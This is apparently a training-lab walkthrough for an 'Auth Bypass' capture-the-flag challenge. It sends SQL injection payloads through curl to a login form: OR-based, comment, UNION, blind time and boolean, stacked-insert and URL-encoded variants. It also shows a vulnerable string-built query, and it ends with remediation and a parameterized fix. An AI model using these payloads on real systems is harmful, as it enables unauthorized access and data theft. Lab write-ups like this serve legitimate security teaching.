Auth Bypass
Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!
1
Flags
5
Points
49%
Success Rate
Start Your Challenge
Launch your dedicated machine to begin hacking
~1-2 min setup
Dedicated server
Private instance
Industry standard
This solution is for Flags Mode
This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.
Challenge
Auth Bypass - Complete Solution Walkthrough
Step 1: Initial Discovery and Assessment
- Challenge Presentation: Access the challenge at
<target-ip>:80to understand the objectives and scenario. - Service Discovery: Scan for open ports and services:
nmap -p 1-10000 <target-ip>- Expected Findings: You should discover:
- Port 80: Challenge presentation page
- Port 8080: The target authentication system
- Initial Reconnaissance: Access the authentication system:
curl http://<target-ip>:8080/Step 2: Authentication System Analysis
- Web Interface Analysis: The system presents a login form with username and password fields.
- Authentication Mechanism: The application uses a standard username/password authentication system.
- Backend Analysis: Based on the behavior, the system appears to use SQL database queries for user authentication.
- Normal Authentication Test: Try legitimate login attempts to understand the system behavior:
# Test with valid format but wrong credentials
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin&password=password"Step 3: SQL Injection Testing
- Hypothesis: If the application constructs SQL queries using user input without proper sanitization, it may be vulnerable to SQL injection.
- Basic SQL Injection Test: Test for SQL injection by using single quotes to break the SQL syntax:
# Test for SQL injection vulnerability
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin'&password=test"- SQL Error Analysis: Look for SQL error messages in the response that might indicate vulnerability.
- Comment-Based Injection Strategy: The SQL comment tag
--can be used to ignore the rest of the query, effectively bypassing the password check entirely. - Authentication Bypass Payloads: Test classic SQL injection authentication bypass payloads:
# Classic OR-based authentication bypass
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin' OR '1'='1&password=anything"
# Alternative payload
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin' OR 1=1--&password=test"
# Comment-based bypass
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin'--&password=anything"Step 4: Successful Authentication Bypass
- Working Payload: The following payload should successfully bypass authentication:
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin' OR '1'='1&password=test"- Expected Response: Upon successful bypass, the application should return a success message containing the flag.
- Alternative Successful Payloads: Other payloads that should work:
# Using UNION injection approach
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=' UNION SELECT 1--&password=test"
# Comment out password check
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin'/*&password=*/OR/**/1=1--"Step 5: Flag Extraction
- Flag Discovery: Upon successful authentication bypass, the application displays the flag in the response.
- Flag Verification: The flag will be displayed in UUID format when the SQL injection is successful.
- Web Browser Method: You can also perform the attack using a web browser by manually entering the SQL injection payload in the username field.
Step 6: Understanding the Vulnerability
- Root Cause Analysis: The vulnerability exists because the application constructs SQL queries by directly concatenating user input without proper parameterization or sanitization.
- Vulnerable Code Pattern: The problematic SQL query likely looks like:
# Vulnerable SQL construction
query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"- Attack Mechanism: By injecting SQL syntax into the username field, attackers can modify the query logic to always return true, bypassing authentication.
- Modified Query Example: When the payload
admin' OR '1'='1is used:
# Resulting malicious query
SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='test'Step 7: Advanced SQL Injection Techniques
- Time-Based Blind SQL Injection: If the application doesn't show direct output, you can use time delays:
# Time-based payload
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin'; WAITFOR DELAY '0:0:5'--&password=test"- Boolean-Based Blind SQL Injection: Test logical conditions:
# Boolean-based payload
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin' AND (SELECT COUNT(*) FROM users)>0--&password=test"- Database Enumeration: Extract database information:
# Extract database version
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=' UNION SELECT @@version--&password=test"Step 8: Alternative Attack Vectors
- Password Field Injection: Test SQL injection in the password field:
# Password field SQL injection
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin&password=' OR '1'='1"- Stacked Queries: If the database supports multiple statements:
# Stacked query injection
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin'; INSERT INTO users VALUES('hacker','pass')--&password=test"- URL Encoding: If special characters are filtered, use URL encoding:
# URL encoded payload
curl -X POST http://<target-ip>:8080/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin%27%20OR%20%271%27%3D%271&password=test"Security Implications and Remediation
- Vulnerability Classification: This is a critical SQL injection vulnerability (CWE-89) that allows authentication bypass and potentially data exfiltration.
- Impact Assessment: Successful exploitation allows:
- Complete authentication bypass
- Unauthorized access to protected resources
- Potential data extraction from the database
- Possible privilege escalation
- Proper Remediation:
- Use parameterized queries/prepared statements
- Implement input validation and sanitization
- Apply principle of least privilege for database access
- Use stored procedures with proper parameter handling
- Implement Web Application Firewalls (WAF)
- Regular security code reviews and testing
- Secure Implementation Example:
# Secure parameterized query (Python example)
import sqlite3
def authenticate_user(username, password):
conn = sqlite3.connect('database.db')
cursor = conn.cursor()
# Secure parameterized query
query = "SELECT * FROM users WHERE username = ? AND password = ?"
cursor.execute(query, (username, password))
result = cursor.fetchone()
conn.close()
return result is not NoneTools and Techniques Summary
- Manual Testing: curl, web browser, manual payload crafting
- Automated Tools: sqlmap, Burp Suite, OWASP ZAP
- Payload Types: OR-based, UNION-based, comment injection, time-based blind
- Detection Methods: Error-based, boolean-based, time-based responses
- Database Enumeration: Version detection, table discovery, data extraction